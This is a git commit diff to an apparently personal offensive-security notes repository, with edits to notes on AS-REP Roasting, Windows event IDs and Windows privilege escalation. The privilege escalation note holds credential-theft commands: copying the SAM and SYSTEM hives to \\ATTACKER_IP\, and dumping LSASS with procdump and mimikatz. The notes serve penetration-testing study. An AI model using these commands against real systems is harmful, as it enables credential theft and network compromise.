whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

more info

This commit is contained in:
gurkenhabicht 2026-04-03 21:56:33 +02:00
parent ccaa96dab5
commit c78967a9a9
3 changed files with 24 additions and 11 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
Enumeration/AS-REP Roasting.md
View File

@ -1,4 +1,10 @@
# AS-Rep Roating # AS-Rep Roasting
AS-REP Roasting targets account for which preauthentication is disabled.
This means `DONT_REQUIRE_PREAUTH` for an account is enabled, and the DC skips
the verification step. After event type `4768` the `Pre_Authentication_Type=0`
and event code `4769` and `4624` is never triggered.
A service can be requested without any password check.
AS-Rep Roasting dumps user accounts which did not enable pre-authentication. AS-Rep Roasting dumps user accounts which did not enable pre-authentication.
This is somewhat similar to Kerberoasting but includes user accounts as well. This is somewhat similar to Kerberoasting but includes user accounts as well.

1
Forensics/Windows Event Logs.md
View File

@ -27,6 +27,7 @@ Get-WinEvent -FilterHashTable @{LogName='<Category>';ID='<Event IDs>'} | fl
* **1**: Process Creation (Applications & Services -> Microsoft -> Windows -> * **1**: Process Creation (Applications & Services -> Microsoft -> Windows ->
Sysmon -> Operational) Sysmon -> Operational)
* **10**: ProcessAccess, Sysmon event where one process opens a handle to another process
* **4688**: Process Creation (Windows Logs -> Security) * **4688**: Process Creation (Windows Logs -> Security)
### Files ### Files

12
Post Exploitation/Windows/Windows PrivEsc.md
View File

@ -324,12 +324,14 @@ socat tcp-listen:135 reuseaddr,fork tcp:$TARGET_IP:1234
### Volume Shadow Copy Service ### Volume Shadow Copy Service
* Take a look at the volumes at Take a look at the volumes at
```sh ```sh
vssadmin list shadows vssadmin list shadows
``` ```
* Copy `sam` and `system` from the shadow copy Copy `sam` and `system` from the shadow copy
```sh ```sh
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam \\ATTACKER_IP\ copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam \\ATTACKER_IP\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system \\ATTACKER_IP\ copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system \\ATTACKER_IP\
@ -337,10 +339,14 @@ copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sys
### Dump LSASS ### Dump LSASS
* If administrator permissions are gained, a dump file can be created by opening the task manager and right clicking `lsass.exe` -> `creat dumpfile` LSASS contains multiple different credential types like NTLM password hashes,
active krb session tickets, plaintext passwords and cached domain credentials.
* If administrator permissions are gained, a dump file can be created by opening the task manager and right-clicking `lsass.exe` -> `creat dumpfile`
* Use `procdump.exe` from sysinternal suite as an alternative to `tskmgr.exe` * Use `procdump.exe` from sysinternal suite as an alternative to `tskmgr.exe`
* Extract the dump via mimikatz * Extract the dump via mimikatz
```sh ```sh
privilege::debug privilege::debug
sekurlsa::logonpasswords sekurlsa::logonpasswords